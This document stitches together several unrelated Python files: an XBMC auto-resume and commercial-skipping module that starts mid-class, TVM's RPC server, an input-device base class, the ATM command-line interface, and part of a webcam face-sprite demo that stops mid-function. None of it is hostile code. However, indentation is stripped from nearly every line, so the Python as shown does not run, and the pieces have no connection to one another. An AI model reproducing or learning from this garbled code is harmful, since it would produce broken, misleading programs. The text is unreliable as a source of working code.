'''Mimics XBMC video player's builtin auto resume functionality'''
def __init__(self, player, program, translator):
self.player = player
self.program = program
self.translator = translator
#self.fps = None
def onPlayBackStarted(self):
self._resumeFromBookmark()
def onPlayBackStopped(self):
self._saveLastPositionAsBookmark()
def onPlayBackEnded(self):
self._clearBookmark()
def _clearBookmark(self):
if self.program.isBookmarked():
self.program.setBookmark(0.0)
def _resumeFromBookmark(self):
log.debug('bookmarker : before wait for gotFPS')
bookmarkSecs = self.program.getBookmark()
if bookmarkSecs > 0 and bookmarkSecs < (self.program.getDuration() * 60):
fb = formatSeconds(bookmarkSecs)
log.debug('Resuming recording at bookmarked position of %s' % fb)
showPopup(self.program.title(), self.translator.get(m.RESUMING_AT) % fb)
self.player.seekTime(bookmarkSecs)
while self.player.getTime() < bookmarkSecs:
log.debug('Waiting for player time %s to seek past bookmark of %s' %(formatSeconds(self.player.getTime()), fb))
xbmc.sleep(SLEEP_MILLIS)
else:
log.debug('Recording has no bookmark or bookmark exceeds program length')
def _saveLastPositionAsBookmark(self):
lastPos = self.player.tracker.getLastPosition()
log.debug('Setting bookmark on %s to %s' %(safe_str(self.program.title()), formatSeconds(lastPos)))
try:
self.program.setBookmark(lastPos)
except:
log.exception('_saveLastPositionAsBookmark catchall')
class PositionTracker(object):
"""
Tracks the last position of the player. This is necessary because
Player.getTime() is not valid after the callback to
Player.onPlayBackStopped() has completed.
"""
HISTORY_SECS = 5 # Number of seconds of history to keep around
def __init__(self, player):
self._player = player
self._lastPos = 0.0
self._tracker = BoundedEvictingQueue((1000/SLEEP_MILLIS) * self.HISTORY_SECS)
self._history = []
def onPlayBackStarted(self):
log.debug('Starting position tracker...')
self._tracker = threading.Thread(
name='Position Tracker',
target = self._trackPosition)
self._tracker.start()
def onPlayBackStopped(self):
if self._tracker.isAlive():
log.debug('Position tracker stop called. Still alive = %s' % self._tracker.isAlive())
else:
log.debug('Position tracker thread already dead.')
def onPlayBackEnded(self):
self.onPlayBackStopped()
def getHistory(self, howFarBack):
"""Returns a list of TrackerSamples from 'howFarBack' seconds ago."""
endPos = self._lastPos
startPos = endPos - howFarBack
slice = []
for sample in self._history:
if startPos <= sample.pos and sample.pos <= endPos:
slice.append(sample)
log.debug('Tracker history for %s secs = [%s] %s' % (howFarBack, len(slice), slice))
return slice
def getLastPosition(self):
return self._lastPos
def _trackPosition(self):
"""Method run in a separate thread. Tracks last position of player as long as it is playing"""
try:
while self._player.isPlaying():
self._lastPos = self._player.getTime()
self._history.append(TrackerSample(time.time(), self._lastPos))
#log.debug('Tracker time = %s' % self._lastPos)
xbmc.sleep(SLEEP_MILLIS)
log.debug('Position tracker thread exiting with lastPos = %s' % self.getLastPosition())
except:
log.exception('_trackPosition catchall')
class TrackerSample(object):
def __init__(self, time, pos):
self.time = time
self.pos = pos
def __repr__(self):
return 'Sample {time = %s, pos = %s}' % (self.time, self.pos)
class ICommercialSkipper(object):
"""Common interface for commercial skipping implementations."""
def __init__(self, player, program, translator):
self.player = player
self.program = program
self.translator = translator
def onPlayBackStarted(self):
raise NotImplementedError, 'Abstract base class'
def onPlayBackStopped(self):
raise NotImplementedError, 'Abstract base class'
def onPlayBackEnded(self):
raise NotImplementedError, 'Abstract base class'
class NoOpCommercialSkipper(ICommercialSkipper):
def __init__(self, player=None, program=None, translator=None):
ICommercialSkipper.__init__(self, player, program, translator)
def onPlayBackStarted(self):
pass
def onPlayBackStopped(self):
pass
def onPlayBackEnded(self):
pass
class TrackingCommercialSkipper(ICommercialSkipper):
"""
Commercial skipper that monitors the position of the currently playing file
and skips commercials accordingly.
"""
def __init__(self, player, program, translator):
ICommercialSkipper.__init__(self, player, program, translator)
def onPlayBackStarted(self):
log.debug('program in skipper = %s' % safe_str(self.program.title()))
# don't want changes to commbreak.skipped to stick beyond the scope of
# this player instance so use a deepcopy
self._breaks = copy.deepcopy(self.program.getCommercials())
# Has a value when video position falls in a comm break
self._currentBreak = None
for b in self._breaks:
log.debug('break = %s' % b)
self._skipper = threading.Thread(name='Tracking Commercial Skipper', target = self._trackCommercials)
self._skipper.start()
def onPlayBackStopped(self):
if self._skipper.isAlive():
log.debug('Commercial tracker stop called. Still alive = %s' % self._skipper.isAlive())
else:
log.debug('Commercial tracker thread already dead')
def onPlayBackEnded(self):
self.onPlayBackStopped()
def _isInBreak(self, pos):
for b in self._breaks:
if b.isDuring(pos):
self._currentBreak = b
return True
self._currentBreak = None
return False
def _trackCommercials(self):
"""Method run in a separate thread to skip over commercials"""
try:
if len(self._breaks) == 0:
log.debug('Recording %s has no comm breaks, exiting comm tracker' % safe_str(self.program.title()))
return
while self.player.isPlaying():
pos = self.player.getTime()
if self._isInBreak(pos) and not self._currentBreak.skipped:
log.debug('entered comm break = %s' % self._currentBreak)
if self._isCloseToStartOfCommercial(pos) and not self._wasUserSkippingAround(pos):
log.debug('Comm skip activated!')
showPopup(self.program.title(), self.translator.get(m.SKIPPING_COMMERCIAL) % formatSeconds(self._currentBreak.duration()), 3000)
self.player.seekTime(self._currentBreak.end)
self._waitForPlayerToPassCommercialBreak()
self._currentBreak.skipped = True
if self._landedInCommercial(pos):
log.debug("Landed in comm break and want to skip forward")
showPopup(self.program.title(), self.translator.get(m.FORWARDING_THROUGH) % formatSeconds(self._currentBreak.duration()), 3000)
self.player.seekTime(self._currentBreak.end)
self._waitForPlayerToPassCommercialBreak()
self._currentBreak.skipped = True
xbmc.sleep(SLEEP_MILLIS)
log.debug('Commercial tracker thread exiting')
except:
log.exception('_trackCommercials catchall')
def _landedInCommercial(self, currPos):
#samplesInCommercial = 4 # In commercial for 2 seconds
secondsToSample = 4
samples = self.player.tracker.getHistory(secondsToSample)
samplesInCommercial = len(filter(lambda x: self._currentBreak.isDuring(x.pos), samples))
log.debug('Samples in commercial = %d' % samplesInCommercial)
return samplesInCommercial > 8 and samplesInCommercial < 12
def _wasUserSkippingAround(self, currPos):
"""
Check last 2 seconds of history for number of samples.
        A high number of samples indicates that the user was probably
        not skipping around in the video, hence the comm skip would
be a good thing.
"""
wasSkipping = False
samplePeriodSecs = 2 # TODO: Pass in as param to method call
# If currPos is too close to the start of the video..assume not
# skipping around
if currPos > samplePeriodSecs:
requiredSamples = 6 # TODO: Derive as percentage instead of hardcoding
numSamples = len(self.player.tracker.getHistory(samplePeriodSecs))
log.debug('Samples in last %s seconds = %s' %(samplePeriodSecs, numSamples))
wasSkipping = numSamples < requiredSamples
log.debug('User was skipping around = %s' % wasSkipping)
return wasSkipping
def _isCloseToStartOfCommercial(self, currPos):
"""
check that the current pos is close in proximity to the start of the
commercial break. assumes that comm break is skipped only if the user
played directly into the commercial vs. landing inside the commercial
via ffwd, rewind, etc.
"""
windowStart = self._currentBreak.start - 1
windowEnd = self._currentBreak.start + 2
isClose = currPos >= windowStart and currPos <= windowEnd
log.debug('User close to start of comm break = %s' % isClose)
return isClose
def _waitForPlayerToPassCommercialBreak(self):
# TODO: What if user stops playing while in this loop? Add isPlaying() to loop invariant
# wait for player pos to pass current break
while self._currentBreak.isDuring(self.player.getTime()):
xbmc.sleep(SLEEP_MILLIS)
|
server.py
|
"""RPC server implementation.
Note
----
Server is TCP based with the following protocol:
- Initial handshake to the peer
- [RPC_MAGIC, keysize(int32), key-bytes]
- The key is in format
- {server|client}:device-type[:random-key] [-timeout=timeout]
"""
from __future__ import absolute_import
import os
import ctypes
import socket
import select
import struct
import logging
import multiprocessing
import subprocess
import time
import sys
import signal
from .._ffi.function import register_func
from .._ffi.base import py_str
from .._ffi.libinfo import find_lib_path
from ..module import load as _load_module
from ..contrib import util
from . import base
from . base import TrackerCode
def _server_env(load_library, logger):
"""Server environment function return temp dir"""
temp = util.tempdir()
if logger is None:
logger = logging.getLogger()
# pylint: disable=unused-variable
@register_func("tvm.rpc.server.workpath")
def get_workpath(path):
return temp.relpath(path)
@register_func("tvm.rpc.server.load_module", override=True)
def load_module(file_name):
"""Load module from remote side."""
path = temp.relpath(file_name)
m = _load_module(path)
logger.info("load_module %s", path)
return m
libs = []
load_library = load_library.split(":") if load_library else []
for file_name in load_library:
file_name = find_lib_path(file_name)[0]
libs.append(ctypes.CDLL(file_name, ctypes.RTLD_GLOBAL))
logger.info("Load additional library %s", file_name)
temp.libs = libs
return temp
def _serve_loop(sock, addr, load_library, silent):
"""Server loop"""
logger = logging.getLogger("RPCServer")
if silent:
logger.disabled = True
sockfd = sock.fileno()
temp = _server_env(load_library, logger)
base._ServerLoop(sockfd)
temp.remove()
logger.info("Finish serving %s", addr)
def _parse_server_opt(opts):
# parse client options
ret = {}
for kv in opts:
if kv.startswith("-timeout="):
ret["timeout"] = float(kv[9:])
return ret
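# For example (illustrative): _parse_server_opt(["-timeout=10"]) returns {"timeout": 10.0}.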
def _listen_loop(sock, port, rpc_key, tracker_addr, load_library, custom_addr, silent):
"""Listening loop of the server master."""
logger = logging.getLogger("RPCServer")
if silent:
logger.disabled = True
def _accept_conn(listen_sock, tracker_conn, ping_period=2):
"""Accept connection from the other places.
Parameters
----------
listen_sock: Socket
The socket used by listening process.
        tracker_conn : connection to tracker
Tracker connection
ping_period : float, optional
ping tracker every k seconds if no connection is accepted.
"""
old_keyset = set()
# Report resource to tracker
if tracker_conn:
matchkey = base.random_key(rpc_key + ":")
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey), custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
else:
matchkey = rpc_key
unmatch_period_count = 0
unmatch_timeout = 4
# Wait until we get a valid connection
while True:
if tracker_conn:
trigger = select.select([listen_sock], [], [], ping_period)
if not listen_sock in trigger[0]:
base.sendjson(tracker_conn, [TrackerCode.GET_PENDING_MATCHKEYS])
pending_keys = base.recvjson(tracker_conn)
old_keyset.add(matchkey)
# if match key not in pending key set
# it means the key is acquired by a client but not used.
if matchkey not in pending_keys:
unmatch_period_count += 1
else:
unmatch_period_count = 0
# regenerate match key if key is acquired but not used for a while
if unmatch_period_count * ping_period > unmatch_timeout + ping_period:
logger.info("no incoming connections, regenerate key ...")
matchkey = base.random_key(rpc_key + ":", old_keyset)
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey),
custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
unmatch_period_count = 0
continue
conn, addr = listen_sock.accept()
magic = struct.unpack("<i", base.recvall(conn, 4))[0]
if magic != base.RPC_MAGIC:
conn.close()
continue
keylen = struct.unpack("<i", base.recvall(conn, 4))[0]
key = py_str(base.recvall(conn, keylen))
arr = key.split()
expect_header = "client:" + matchkey
server_key = "server:" + rpc_key
if arr[0] != expect_header:
conn.sendall(struct.pack("<i", base.RPC_CODE_MISMATCH))
conn.close()
logger.info("mismatch key from %s", addr)
continue
else:
conn.sendall(struct.pack("<i", base.RPC_CODE_SUCCESS))
conn.sendall(struct.pack("<i", len(server_key)))
conn.sendall(server_key.encode("utf-8"))
return conn, addr, _parse_server_opt(arr[1:])
# Server logic
tracker_conn = None
while True:
try:
# step 1: setup tracker and report to tracker
if tracker_addr and tracker_conn is None:
tracker_conn = base.connect_with_retry(tracker_addr, silent=silent)
tracker_conn.sendall(struct.pack("<i", base.RPC_TRACKER_MAGIC))
magic = struct.unpack("<i", base.recvall(tracker_conn, 4))[0]
if magic != base.RPC_TRACKER_MAGIC:
raise RuntimeError("%s is not RPC Tracker" % str(tracker_addr))
# report status of current queue
cinfo = {"key" : "server:" + rpc_key}
base.sendjson(tracker_conn,
[TrackerCode.UPDATE_INFO, cinfo])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
# step 2: wait for in-coming connections
conn, addr, opts = _accept_conn(sock, tracker_conn)
except (socket.error, IOError):
# retry when tracker is dropped
if tracker_conn:
tracker_conn.close()
tracker_conn = None
continue
except RuntimeError as exc:
if silent:
return
else:
raise exc
# step 3: serving
logger.info("connection from %s", addr)
server_proc = multiprocessing.Process(target=_serve_loop,
args=(conn, addr, load_library, silent))
        server_proc.daemon = True
server_proc.start()
# close from our side.
conn.close()
# wait until server process finish or timeout
server_proc.join(opts.get("timeout", None))
if server_proc.is_alive():
logger.info("Timeout in RPC session, kill..")
server_proc.terminate()
def _connect_proxy_loop(addr, key, load_library, silent):
logger = logging.getLogger("RPCProxy")
if silent:
logger.disabled = True
key = "server:" + key
retry_count = 0
max_retry = 5
retry_period = 5
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(addr)
sock.sendall(struct.pack("<i", base.RPC_MAGIC))
sock.sendall(struct.pack("<i", len(key)))
sock.sendall(key.encode("utf-8"))
magic = struct.unpack("<i", base.recvall(sock, 4))[0]
if magic == base.RPC_CODE_DUPLICATE:
raise RuntimeError("key: %s has already been used in proxy" % key)
elif magic == base.RPC_CODE_MISMATCH:
logger.info("RPCProxy do not have matching client key %s", key)
elif magic != base.RPC_CODE_SUCCESS:
raise RuntimeError("%s is not RPC Proxy" % str(addr))
keylen = struct.unpack("<i", base.recvall(sock, 4))[0]
remote_key = py_str(base.recvall(sock, keylen))
opts = _parse_server_opt(remote_key.split()[1:])
logger.info("connected to %s", str(addr))
process = multiprocessing.Process(
target=_serve_loop, args=(sock, addr, load_library, silent))
            process.daemon = True
process.start()
sock.close()
process.join(opts.get("timeout", None))
if process.is_alive():
logger.info("Timeout in RPC session, kill..")
process.terminate()
retry_count = 0
except (socket.error, IOError) as err:
retry_count += 1
logger.info("Error encountered %s, retry in %g sec", str(err), retry_period)
if retry_count > max_retry:
raise RuntimeError("Maximum retry error: last error: %s" % str(err))
time.sleep(retry_period)
def _popen(cmd):
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=os.environ)
(out, _) = proc.communicate()
if proc.returncode != 0:
msg = "Server invoke error:\n"
msg += out
raise RuntimeError(msg)
class Server(object):
"""Start RPC server on a separate process.
This is a simple python implementation based on multi-processing.
    It is also possible to implement a similar C based server with
TVM runtime which does not depend on the python.
Parameters
----------
host : str
The host url of the server.
port : int
The port to be bind to
port_end : int, optional
The end port to search
is_proxy : bool, optional
Whether the address specified is a proxy.
If this is true, the host and port actually corresponds to the
address of the proxy server.
use_popen : bool, optional
Whether to use Popen to start a fresh new process instead of fork.
This is recommended to switch on if we want to do local RPC demonstration
for GPU devices to avoid fork safety issues.
tracker_addr: Tuple (str, int) , optional
        The address of RPC Tracker in tuple(host, port) format.
If is not None, the server will register itself to the tracker.
key : str, optional
The key used to identify the device type in tracker.
load_library : str, optional
List of additional libraries to be loaded during execution.
custom_addr: str, optional
        Custom IP address to report to the RPC Tracker.
silent: bool, optional
        Whether to run this server in silent mode.
"""
def __init__(self,
host,
port=9091,
port_end=9199,
is_proxy=False,
use_popen=False,
tracker_addr=None,
key="",
load_library=None,
custom_addr=None,
silent=False):
try:
if base._ServerLoop is None:
raise RuntimeError("Please compile with USE_RPC=1")
except NameError:
raise RuntimeError("Please compile with USE_RPC=1")
self.host = host
self.port = port
self.libs = []
self.custom_addr = custom_addr
self.use_popen = use_popen
self.logger = logging.getLogger("RPCServer")
if silent:
self.logger.disabled = True
if use_popen:
cmd = [sys.executable,
"-m", "tvm.exec.rpc_server",
"--host=%s" % host,
"--port=%s" % port]
if tracker_addr:
assert key
cmd += ["--tracker=%s:%d" % tracker_addr,
"--key=%s" % key]
if load_library:
cmd += ["--load-library", load_library]
if custom_addr:
cmd += ["--custom-addr", custom_addr]
if silent:
cmd += ["--silent"]
self.proc = subprocess.Popen(cmd, preexec_fn=os.setsid)
time.sleep(0.5)
elif not is_proxy:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = None
for my_port in range(port, port_end):
try:
sock.bind((host, my_port))
self.port = my_port
break
except socket.error as sock_err:
if sock_err.errno in [98, 48]:
continue
else:
raise sock_err
if not self.port:
raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
self.logger.info("bind to %s:%d", host, self.port)
sock.listen(1)
self.sock = sock
self.proc = multiprocessing.Process(
target=_listen_loop, args=(
self.sock, self.port, key, tracker_addr, load_library,
self.custom_addr, silent))
            self.proc.daemon = True
self.proc.start()
else:
self.proc = multiprocessing.Process(
target=_connect_proxy_loop, args=((host, port), key, load_library, silent))
            self.proc.daemon = True
self.proc.start()
def terminate(self):
"""Terminate the server process"""
if self.use_popen:
if self.proc:
os.killpg(self.proc.pid, signal.SIGTERM)
self.proc = None
else:
if self.proc:
self.proc.terminate()
self.proc = None
def __del__(self):
self.terminate()
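# Usage sketch: a minimal, hedged example of driving the Server class above.
# It assumes a TVM runtime built with USE_RPC=1; the tracker address
# ("127.0.0.1", 9190) and the device key "example-device" are placeholders,
# not values mandated by this module.
def _example_standalone_server():
    server = Server("0.0.0.0", port=9091, port_end=9199,
                    tracker_addr=("127.0.0.1", 9190),
                    key="example-device")
    try:
        time.sleep(60)  # keep the listener alive and serve incoming sessions
    finally:
        server.terminate()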
|
skeleton.py
|
import threading
from copy import copy
from helpers import setup_logger
logger = setup_logger(__name__, "warning")
class InputSkeleton(object):
"""Base class for input devices. Expectations from children:
* ``self.default_mapping`` variable to be set unless you're always going to pass mapping as argument in config
    * ``self.runner`` to be set to a function that'll run in the background, scanning for button presses and sending events to ``send_key``
* main thread to stop sending keys if self.enabled is False
* main thread to exit immediately if self.stop_flag is True"""
enabled = True
stop_flag = False
available_keys = None
def __init__(self, mapping=None, threaded=True):
if mapping is not None:
self.mapping = mapping
else:
self.mapping = self.default_mapping
try:
self.init_hw()
except AttributeError:
logger.error("{}: init_hw function not found!".format(self.__class__))
self.set_available_keys()
if threaded:
self.start_thread()
def start(self):
"""Sets the ``enabled`` for loop functions to start sending keycodes."""
self.enabled = True
def set_available_keys(self):
"""
A simple ``i.available_keys``-setting code that assumes the driver's mapping is a plain
list of key names. If it's not so, the driver needs to override the
``set_available_keys`` method to properly generate the ``available_keys`` list.
"""
if not hasattr(self, "mapping"):
logger.warning("mapping not available - the HID driver is used?")
logger.warning("available_keys property set to None!")
self.available_keys = None
return
if type(self.mapping) not in (list, tuple):
raise ValueError("Can't use mapping as available_keys - not a list/tuple!")
if not all([isinstance(el, basestring) for el in self.mapping]):
raise ValueError("Can't use mapping as a capability if it's not a list of strings!")
if not all([el.startswith("KEY_") for el in self.mapping]):
nonkey_items = [el for el in self.mapping if not el.startswith("KEY_")]
raise ValueError("Can't use mapping as a capability if its elements don't start with \"KEY_\"! (non-KEY_ items: {})".format(nonkey_items))
self.available_keys = copy(list(self.mapping))
def stop(self):
"""Unsets the ``enabled`` for loop functions to stop sending keycodes."""
self.enabled = False
def send_key(self, key):
"""A hook to be overridden by ``InputListener``. Otherwise, prints out key names as soon as they're pressed so is useful for debugging (to test things, just launch the driver as ``python driver.py``)"""
logger.debug(key)
def start_thread(self):
"""Starts a thread with ``start`` function as target."""
self.thread = threading.Thread(target=self.runner)
self.thread.daemon = True
self.thread.start()
def atexit(self):
self.stop_flag = True
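# Example driver sketch: the class docstring above lists what a child driver
# must provide. This hypothetical subclass illustrates those expectations with
# a made-up three-key mapping and a stubbed runner() polling loop; the
# poll_hardware() call is a placeholder for real button scanning.
class ExampleDriver(InputSkeleton):
    default_mapping = ["KEY_UP", "KEY_DOWN", "KEY_ENTER"]

    def init_hw(self):
        # a real driver would open its bus/GPIO here
        pass

    def runner(self):
        import time  # local import; the rest of this module does not need it
        while not self.stop_flag:
            # key_index = poll_hardware()
            # if self.enabled and key_index is not None:
            #     self.send_key(self.mapping[key_index])
            time.sleep(0.01)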
|
cli.py
|
# -*- coding: utf-8 -*-
import argparse
import glob
import logging
import multiprocessing
import os
import shutil
import time
import psutil
from daemon import DaemonContext
from lockfile.pidlockfile import PIDLockFile
from atm.api import create_app
from atm.config import AWSConfig, DatasetConfig, LogConfig, RunConfig, SQLConfig
from atm.core import ATM
LOGGER = logging.getLogger(__name__)
def _get_atm(args):
sql_conf = SQLConfig(args)
aws_conf = AWSConfig(args)
log_conf = LogConfig(args)
return ATM(sql_conf, aws_conf, log_conf)
def _work(args, wait=False):
"""Creates a single worker."""
atm = _get_atm(args)
atm.work(
datarun_ids=getattr(args, 'dataruns', None),
choose_randomly=False,
save_files=args.save_files,
cloud_mode=args.cloud_mode,
total_time=getattr(args, 'total_time', None),
wait=wait
)
def _serve(args):
"""Launch the ATM API with the given host / port."""
atm = _get_atm(args)
app = create_app(atm, getattr(args, 'debug', False))
app.run(host=args.host, port=args.port)
def _get_pid_path(pid):
"""Returns abspath of the pid file which is stored on the cwd."""
pid_path = pid
if not os.path.isabs(pid_path):
pid_path = os.path.join(os.getcwd(), pid_path)
return pid_path
def _get_atm_process(pid_path):
"""Return `psutil.Process` of the `pid` file. If the pidfile is stale it will release it."""
pid_file = PIDLockFile(pid_path, timeout=1.0)
if pid_file.is_locked():
pid = pid_file.read_pid()
try:
process = psutil.Process(pid)
if process.name() == 'atm':
return process
else:
pid_file.break_lock()
except psutil.NoSuchProcess:
pid_file.break_lock()
def _status(args):
"""Check if the current ATM process is runing."""
pid_path = _get_pid_path(args.pid)
process = _get_atm_process(pid_path)
if process:
workers = 0
addr = None
for child in process.children():
connections = child.connections()
if connections:
connection = connections[0]
addr = connection.laddr
else:
workers += 1
s = 's' if workers > 1 else ''
print('ATM is running with {} worker{}'.format(workers, s))
if addr:
print('ATM REST server is listening on http://{}:{}'.format(addr.ip, addr.port))
else:
        print('ATM is not running.')
def _start_background(args):
"""Launches the server/worker in daemon processes."""
if args.server:
LOGGER.info('Starting the REST API server')
process = multiprocessing.Process(target=_serve, args=(args, ))
process.daemon = True
process.start()
pool = multiprocessing.Pool(args.workers)
for _ in range(args.workers):
LOGGER.info('Starting background worker')
pool.apply_async(_work, args=(args, True))
pool.close()
pool.join()
def _start(args):
"""Create a new process of ATM pointing the process to a certain `pid` file."""
pid_path = _get_pid_path(args.pid)
process = _get_atm_process(pid_path)
if process:
print('ATM is already running!')
else:
print('Starting ATM')
if args.foreground:
_start_background(args)
else:
pidfile = PIDLockFile(pid_path, timeout=1.0)
with DaemonContext(pidfile=pidfile, working_directory=os.getcwd()):
# Set up default log file if not already set
if not args.logfile:
_logging_setup(args.verbose, 'atm.log')
_start_background(args)
def _stop(args):
"""Stop the current running process of ATM."""
pid_path = _get_pid_path(args.pid)
process = _get_atm_process(pid_path)
if process:
process.terminate()
for _ in range(args.timeout):
if process.is_running():
time.sleep(1)
else:
break
if process.is_running():
print('ATM was not able to stop after {} seconds.'.format(args.timeout))
if args.force:
print('Killing it.')
process.kill()
else:
print('Use --force to kill it.')
else:
print('ATM stopped correctly.')
else:
print('ATM is not running.')
def _restart(args):
_stop(args)
time.sleep(1)
pid_path = _get_pid_path(args.pid)
process = _get_atm_process(pid_path)
if process:
print('ATM did not stop correctly. Aborting')
else:
_start(args)
def _enter_data(args):
atm = _get_atm(args)
run_conf = RunConfig(args)
dataset_conf = DatasetConfig(args)
atm.enter_data(dataset_conf, run_conf)
def _copy_files(pattern, source, target=None):
if isinstance(source, (list, tuple)):
source = os.path.join(*source)
if target is None:
target = source
source_dir = os.path.join(os.path.dirname(__file__), source)
target_dir = os.path.join(os.getcwd(), target)
if not os.path.exists(target_dir):
os.makedirs(target_dir)
for source_file in glob.glob(os.path.join(source_dir, pattern)):
target_file = os.path.join(target_dir, os.path.basename(source_file))
print('Generating file {}'.format(target_file))
shutil.copy(source_file, target_file)
def _make_config(args):
_copy_files('*.yaml', ('config', 'templates'))
def _get_demos(args):
_copy_files('*.csv', ('data', 'test'), 'demos')
def _get_parser():
logging_args = argparse.ArgumentParser(add_help=False)
logging_args.add_argument('-v', '--verbose', action='count', default=0)
logging_args.add_argument('-l', '--logfile')
parser = argparse.ArgumentParser(description='ATM Command Line Interface',
parents=[logging_args])
subparsers = parser.add_subparsers(title='action', help='Action to perform')
parser.set_defaults(action=None)
# Common Arguments
sql_args = SQLConfig.get_parser()
aws_args = AWSConfig.get_parser()
log_args = LogConfig.get_parser()
run_args = RunConfig.get_parser()
dataset_args = DatasetConfig.get_parser()
# Enter Data Parser
enter_data_parents = [
logging_args,
sql_args,
aws_args,
dataset_args,
log_args,
run_args
]
enter_data = subparsers.add_parser('enter_data', parents=enter_data_parents,
help='Add a Dataset and trigger a Datarun on it.')
enter_data.set_defaults(action=_enter_data)
    # Worker Args
worker_args = argparse.ArgumentParser(add_help=False)
worker_args.add_argument('--cloud-mode', action='store_true', default=False,
help='Whether to run this worker in cloud mode')
worker_args.add_argument('--no-save', dest='save_files', action='store_false',
help="don't save models and metrics at all")
# Worker
worker_parents = [
logging_args,
worker_args,
sql_args,
aws_args,
log_args
]
worker = subparsers.add_parser('worker', parents=worker_parents,
help='Start a single worker in foreground.')
worker.set_defaults(action=_work)
worker.add_argument('--dataruns', help='Only train on dataruns with these ids', nargs='+')
worker.add_argument('--total-time', help='Number of seconds to run worker', type=int)
# Server Args
server_args = argparse.ArgumentParser(add_help=False)
server_args.add_argument('--host', help='IP to listen at')
server_args.add_argument('--port', help='Port to listen at', type=int)
# Server
server = subparsers.add_parser('server', parents=[logging_args, server_args, sql_args],
help='Start the REST API Server in foreground.')
server.set_defaults(action=_serve)
server.add_argument('--debug', help='Start in debug mode', action='store_true')
# add_arguments_sql(server)
# Background Args
background_args = argparse.ArgumentParser(add_help=False)
background_args.add_argument('--pid', help='PID file to use.', default='atm.pid')
# Start Args
start_args = argparse.ArgumentParser(add_help=False)
start_args.add_argument('--foreground', action='store_true', help='Run on foreground')
start_args.add_argument('-w', '--workers', default=1, type=int, help='Number of workers')
start_args.add_argument('--no-server', dest='server', action='store_false',
help='Do not start the REST server')
# Start
start_parents = [
logging_args,
worker_args,
server_args,
background_args,
start_args,
sql_args,
aws_args,
log_args
]
start = subparsers.add_parser('start', parents=start_parents,
help='Start an ATM Local Cluster.')
start.set_defaults(action=_start)
# Status
status = subparsers.add_parser('status', parents=[logging_args, background_args])
status.set_defaults(action=_status)
# Stop Args
stop_args = argparse.ArgumentParser(add_help=False)
stop_args.add_argument('-t', '--timeout', default=5, type=int,
help='Seconds to wait before killing the process.')
stop_args.add_argument('-f', '--force', action='store_true',
help='Kill the process if it does not terminate gracefully.')
# Stop
stop = subparsers.add_parser('stop', parents=[logging_args, stop_args, background_args],
help='Stop an ATM Local Cluster.')
stop.set_defaults(action=_stop)
# restart
restart = subparsers.add_parser('restart', parents=start_parents + [stop_args],
help='Restart an ATM Local Cluster.')
restart.set_defaults(action=_restart)
# Make Config
make_config = subparsers.add_parser('make_config', parents=[logging_args],
help='Generate a config templates folder in the cwd.')
make_config.set_defaults(action=_make_config)
# Get Demos
get_demos = subparsers.add_parser('get_demos', parents=[logging_args],
help='Generate a demos folder with demo CSVs in the cwd.')
get_demos.set_defaults(action=_get_demos)
return parser
def _logging_setup(verbosity=1, logfile=None):
logger = logging.getLogger()
log_level = (2 - verbosity) * 10
fmt = '%(asctime)s - %(process)d - %(levelname)s - %(module)s - %(message)s'
formatter = logging.Formatter(fmt)
logger.setLevel(log_level)
logger.propagate = False
if logfile:
file_handler = logging.FileHandler(logfile)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
else:
console_handler = logging.StreamHandler()
console_handler.setLevel(log_level)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
def main():
parser = _get_parser()
args = parser.parse_args()
_logging_setup(args.verbose, args.logfile)
if not args.action:
parser.print_help()
parser.exit()
args.action(args)
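# Programmatic usage sketch: the parser built by _get_parser() can also be
# driven from code (for example in tests) by handing it an argv-style list and
# dispatching through args.action, mirroring what main() does. The
# 'worker --total-time 60' arguments below are illustrative only.
def _example_programmatic_invocation():
    parser = _get_parser()
    args = parser.parse_args(['worker', '--total-time', '60'])
    _logging_setup(args.verbose, args.logfile)
    args.action(args)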
|
snapchat_demo.py
|
from tkinter import *
from PIL import Image
from PIL import ImageTk
import cv2
import threading
import os
import time
from threading import Thread
from os import listdir
from os.path import isfile, join
import dlib
from imutils import face_utils, rotate_bound
import math
# body part IDs for retrieving face landmark info
LEFT_EYEBROW = 1
RIGHT_EYEBROW = 2
LEFT_EYE = 3
RIGHT_EYE = 4
NOSE = 5
MOUTH = 6
ALL_SPRITES = ["Hat", "Mustache", "Flies", "Glasses", "Doggy", "Rainbow", "Googly Eyes"]
WINDOW_NAME = "Not really snapchat"
# class Sprite:
# def __init__(self, name, id):
# self.name = name
# self.id = id
# self.enabled = False
# class StaticSprite(Sprite):
# def __init__(self, name, id, file):
# super().__init__(name, id)
# self.file = file
# def get_sprite(self):
# return self.file
# class AnimatedSprite():
# def __init__(self, name, id, files_dir):
# super().__init__(name, id)
# self.files = files_dir
# self.counter = 0
# def get_sprite(self):
# return self.files[self.counter]
# def animate(self):
# self.counter = (self.counter + 1) % len(self.files)
def toggle_sprite(num):
global SPRITES, BTNS
SPRITES[num] = not SPRITES[num]
BTNS[num].config(relief=SUNKEN if SPRITES[num] else RAISED)
def draw_sprite(frame, sprite, x_offset, y_offset):
(h, w) = (sprite.shape[0], sprite.shape[1])
(imgH, imgW) = (frame.shape[0], frame.shape[1])
if y_offset + h >= imgH: # if sprite gets out of image in the bottom
sprite = sprite[0:imgH - y_offset, :, :]
if x_offset + w >= imgW: # if sprite gets out of image to the right
sprite = sprite[:, 0:imgW - x_offset, :]
if x_offset < 0: # if sprite gets out of image to the left
sprite = sprite[:, abs(x_offset)::, :]
w = sprite.shape[1]
x_offset = 0
    # for each RGB channel
    for ch in range(3):
        # channel index 3 is alpha: 255 is fully opaque, 0 is a transparent background
sprite_pixel = sprite[:, :, ch]
sprite_alpha = (sprite[:, :, 3] / 255.0)
img_pixel = frame[y_offset:y_offset + h, x_offset:x_offset + w, ch]
img_alpha = (1.0 - sprite_alpha)
